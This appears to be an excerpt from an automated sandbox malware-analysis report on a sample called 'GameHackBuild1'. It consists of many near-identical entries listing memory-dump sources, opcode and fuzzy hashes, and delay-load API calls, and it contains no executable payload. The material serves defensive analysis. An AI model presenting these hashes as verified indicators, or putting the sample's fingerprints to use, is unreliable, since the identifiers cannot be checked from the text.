                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 48f48e8a78e6a49572e6a35d0f5c7fcec9146024e801f1608f24dcd8c1451ec3
                                      • Instruction ID: 0855a642dbd374cfcac06fc0d9029727fa1180e3f5e692b90e8d046e0138c07d
                                      • Opcode Fuzzy Hash: 48f48e8a78e6a49572e6a35d0f5c7fcec9146024e801f1608f24dcd8c1451ec3
                                      • Instruction Fuzzy Hash: 7CB012F127C4017C310C61046F02E76022DC5C2B10330891AB20AE01C0D4505D8F0531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 294ddcad23f1c3b096eb4630c14e372e76604b336a3ded4dd74fcd3b2a7bc3a6
                                      • Instruction ID: 6f6dcb5c47e0a4781fea4806e3708fecd2e3a5e42766d57e002e9501720fc8cb
                                      • Opcode Fuzzy Hash: 294ddcad23f1c3b096eb4630c14e372e76604b336a3ded4dd74fcd3b2a7bc3a6
                                      • Instruction Fuzzy Hash: F7B012B127C4017C310C61046E02E76022DC5C3B10330891AB50ED00C0D4405D890531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1E20B
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 5284e23fe47c72de022b3e46e3fd1eb6a8dabab0cbe8f1c70737e319fb5ecfff
                                      • Instruction ID: 1ea37f73e6ff7db2b907d6d78a7a2ffda76360a9fbc706d12242571c4e64a096
                                      • Opcode Fuzzy Hash: 5284e23fe47c72de022b3e46e3fd1eb6a8dabab0cbe8f1c70737e319fb5ecfff
                                      • Instruction Fuzzy Hash: D9B012B627E0027C320C51047F16DF7033CC4C0B50330881AB605D4080A5414E864032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: c12d86e8b10abdd05b02666fbc31c27cd1a4cbb06253ff826e339685e57fa1c2
                                      • Instruction ID: d257dd15e8c7803fc85f9b579089e7052661f3f02c2d85271e29704e0ad9ffdf
                                      • Opcode Fuzzy Hash: c12d86e8b10abdd05b02666fbc31c27cd1a4cbb06253ff826e339685e57fa1c2
                                      • Instruction Fuzzy Hash: E9B012B127D4017C310C61046E02E76026FDAC2B10730491AB10AD00C0D4405C850531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: bc27c19a5c64e2349f64090b98423a685e7c841e4560ac67eb0762e8670aa477
                                      • Instruction ID: 506b933f141545bd3ef220a3ea43b75b1a7294d7926bdf31065da9e4d0b2cbba
                                      • Opcode Fuzzy Hash: bc27c19a5c64e2349f64090b98423a685e7c841e4560ac67eb0762e8670aa477
                                      • Instruction Fuzzy Hash: 0AB012B127D4017C310C61146E02E76026DC5C3B10330891AB60AD00C0D6409CC50531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 8ed4b11ce39bbcc136ba8b57b5a87c653669a5882ffcece65074f1cc628befaa
                                      • Instruction ID: c1358d10d616ad2db5085e3369bf5bba45f155cd518d1a2671f6e0fb6e8f931c
                                      • Opcode Fuzzy Hash: 8ed4b11ce39bbcc136ba8b57b5a87c653669a5882ffcece65074f1cc628befaa
                                      • Instruction Fuzzy Hash: 26B012B127D4017C310C61046E02E76022FC6C3B10730891AB50AD00C0D4405C850531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 6df02fa5cb9efdf3ebb16ada71721301fdf4864a8e26749cfa8eaa9b1990a3ab
                                      • Instruction ID: ba1648c6d1237f0a6e8d56825a91783b75d1535fac43ba83c86be2e8aa8a778e
                                      • Opcode Fuzzy Hash: 6df02fa5cb9efdf3ebb16ada71721301fdf4864a8e26749cfa8eaa9b1990a3ab
                                      • Instruction Fuzzy Hash: 89B012B127D5017D314C62046E02E76022FC6C2B507304A1AB10AD00C0D4405CC50531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 231a24088f6024257edc5492f699d2195e2b97b7617399cc0d2d71883a135f60
                                      • Instruction ID: a66d9c0971dbe4a438ee586a3e6216c4158c17b048344e438a6c26fdcf2bf316
                                      • Opcode Fuzzy Hash: 231a24088f6024257edc5492f699d2195e2b97b7617399cc0d2d71883a135f60
                                      • Instruction Fuzzy Hash: D5B012B167C4017C310C61046E07E76022DD5C2B103304D2AB50AD00C0D4505C850531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1D8A3
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0d63d49b627af51e9f0a0ccd38cda1672bb03b4c1689cddee2e52ce6398bc8b9
                                      • Instruction ID: e316591ca1ceff0c99dc979004a26982e5bffa6d70fd36354db4925a121030ee
                                      • Opcode Fuzzy Hash: 0d63d49b627af51e9f0a0ccd38cda1672bb03b4c1689cddee2e52ce6398bc8b9
                                      • Instruction Fuzzy Hash: A9B012B127D4017C310C61046F02E7602ADC5C2B10730491AB10AD00C0D5405DC60531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4230ffc49b91c8e32c6503e8c2a8d8073a0591023dcf12d31d7192dcddc01bb5
                                      • Instruction ID: 380df3b1e0acaace11f66f89aa0c864f409377f8e4a2358f6716ac32545448f6
                                      • Opcode Fuzzy Hash: 4230ffc49b91c8e32c6503e8c2a8d8073a0591023dcf12d31d7192dcddc01bb5
                                      • Instruction Fuzzy Hash: 9CB012B127C001FC3108B1056E12E7B026CC4C0B50330C91BB409C40C4D4444D894531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 3586a29210ee36359d2c5cde1ffb7c87c200e9c886050d7fa39362eed0c392d6
                                      • Instruction ID: 38cc1bc630b4432baa0c5cb8c1d1d79299af74bf014c7a8c9bfc0d9801dcaf2c
                                      • Opcode Fuzzy Hash: 3586a29210ee36359d2c5cde1ffb7c87c200e9c886050d7fa39362eed0c392d6
                                      • Instruction Fuzzy Hash: B8B012A127C0017C3108B1056F12F7F027DD4C4B503308D1BB209D4044D4404C8A4531
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: db8fd1bb35c62385fee478e87eb6080a9b56852ee58e1ec279f976b8173fe612
                                      • Instruction ID: d71d0720ee266b0381ea75f7b502bc0ca94987366ad37870fd56af9c43d1f6db
                                      • Opcode Fuzzy Hash: db8fd1bb35c62385fee478e87eb6080a9b56852ee58e1ec279f976b8173fe612
                                      • Instruction Fuzzy Hash: F3B012A637C002BC310C510C2E07EF7023CD0C0B10331891AB50AC1080D9404C894131
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 41e13d0101702509c8ef92fb38996a46be2e2d50388ad3f04f7e40b5bd0cddb9
                                      • Instruction ID: 5cd791816578dab8263f6c634635dc2d7735b0b268fb8312e716c556a9b2552d
                                      • Opcode Fuzzy Hash: 41e13d0101702509c8ef92fb38996a46be2e2d50388ad3f04f7e40b5bd0cddb9
                                      • Instruction Fuzzy Hash: 21B012A637C0027C310C510C2F07EF7023CD0C0B10331881AB20AC0040D9404C864131
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7ed34d89b6ecb8027167b1ecd86e0e268c67e1b1a9ab2ce1ad0db25aa812a3dd
                                      • Instruction ID: 0d1337e6ba328a4e200ead5f6a9b7fe0b706e81af9e83a4c2ed87c7773a0a651
                                      • Opcode Fuzzy Hash: 7ed34d89b6ecb8027167b1ecd86e0e268c67e1b1a9ab2ce1ad0db25aa812a3dd
                                      • Instruction Fuzzy Hash: E2B012A637C1067C320811082E07DF7023CD0C0B50331492AB106D0040D9404CC94031
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DBD5
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7d07136daeba672f13bf0bbec46fbcc98d2f7a4c9e43004dd096d63dbac270b8
                                      • Instruction ID: fad1ab97e991b683d93786d6234acb042c8639dabb6e923c5c6add3563973101
                                      • Opcode Fuzzy Hash: 7d07136daeba672f13bf0bbec46fbcc98d2f7a4c9e43004dd096d63dbac270b8
                                      • Instruction Fuzzy Hash: 67B012A63BC0017C3108511C2E07FF6023DE0C0B10331482AB10BC0040D9404C894131
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DAB2
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 790b064adcf919b0715edb14605a495f16403f7dd2ebe6dd19a24ff27a465c69
                                      • Instruction ID: edd332eaea8e5c9883e9735663d5cc03f69cd3ebd1ccc627b7811beab8fe6338
                                      • Opcode Fuzzy Hash: 790b064adcf919b0715edb14605a495f16403f7dd2ebe6dd19a24ff27a465c69
                                      • Instruction Fuzzy Hash: 18B012A12BC1017C7108B1056E12F7B026DE4C0B50330492BB009C4044D4404C854631
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DC36
                                        • Part of subcall function 00A1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1DFD6
                                        • Part of subcall function 00A1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1DFE7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: e7c21bf64cc90b0b8244626c2dd17d8e89993b7cc13099bbc1ef8b67731db4ae
